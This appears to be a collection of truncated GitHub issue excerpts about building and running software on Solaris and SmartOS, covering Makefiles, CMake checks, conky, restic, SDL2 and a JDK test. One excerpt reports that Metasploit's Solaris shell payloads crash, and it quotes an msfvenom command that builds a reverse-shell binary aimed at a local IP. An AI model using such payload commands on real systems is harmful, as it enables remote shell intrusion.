-
Just wanted to ask why they are not provided? In the "Best Practice" documentation " Smartos/Solaris" is listed as production ready platform and its also recommended to use the prebuilt binaries for …
n1ete updated
4 months ago
-
@Licenser and @siepkes we have released 1.1.0 - but I now realize that our new `Makefile` (based on erlang-mk) does not include any special options for Solaris or SmartOS.
```makefile
UNAME_SYS …
-
The `solaris/x86/shell_reverse_tcp` and `solaris/x86/shell_bind_tcp` payloads segfault on Solaris 11.1.
```
./msfvenom -f elf -p solaris/x86/shell_reverse_tcp LHOST=172.16.191.244 LPORT=1337 > rev…
-
I got the profiler working ok in Solaris. There's a handful of issues which I can submit a PR for such as:
1. usleep doesn't work at all. I replaced it with an **#ifdef**'ed nanosleep.
2. cmake is a b…
-
With #2049 merged, conky now supports `-U` option on Linux which makes it exit early if it detects another instance running. This feature requires a separate implementation for other platforms as they…
-
[jdk8 solaris] sun/jvmstat/monitor/MonitoredVm/MonitorVmStartTerminate.java consistently failed with ` There is insufficient memory for the Java Runtime Environment to continue`
```
16:10:55 Java…
-
Output of `restic version`
--------------------------
restic 0.13.1 compiled with go1.18 on solaris/amd64
On SmartOS joyent_20220714T060459Z
How did you run restic exactly?
--------------------…
-
By default, SDL2 tries to enable support for XRANDR with the SDL_X11_XRANDR option in CMake, for example. The problem is that Solaris 10 does not actually support XRANDR in practice, even though CMake…
-
In pre-publishing review (#91), I found the following passage on `/topics/introduction.md`
> Valkey is written in ANSI C and works on most POSIX systems like Linux, *BSD, and Mac OS X, without exte…
-
Within the cmake config script, `./cmake/sdlchecks.cmake`, there is a check that decides how to enable pthread support for different platforms. If this check detects a platform of either "Solaris" or …